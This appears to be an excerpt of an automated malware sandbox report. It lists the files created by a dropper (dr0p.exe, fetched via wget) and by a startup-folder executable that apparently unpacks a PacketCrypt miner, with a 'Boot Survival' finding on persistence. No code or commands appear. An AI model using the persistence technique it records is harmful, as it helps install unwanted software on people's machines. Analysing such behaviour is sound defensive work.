Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Transactions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.DataSetExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Asn1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Tar.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Timer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.Brotli.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ValueTuple.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Buffers.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Uri.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Ping.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Configuration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.SecureString.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Console.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ServiceModel.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.JavaScript.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Channels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Loader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Sockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ObjectModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\WindowsBase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Claims.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Transactions.Local.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.Writer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Requests.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.CoreLib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Http.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.ILGeneration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XPath.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Principal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\mscorlib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.DispatchProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.Common.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Http.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.ServicePoint.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.DiagnosticSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.NonGeneric.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Metadata.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encodings.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\netstandard.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Memory.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Intrinsics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.DataContractSerialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\wget.exe	File created: C:\Users\user\Desktop\download\dr0p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.MemoryMappedFiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Handles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.DataAnnotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.CSharp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Dataflow.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Thread.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.Lightweight.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.TypeExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Web.HttpUtility.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Immutable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\download\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to dropped file

Source: C:\Users\user\Desktop\download\dr0p.exe

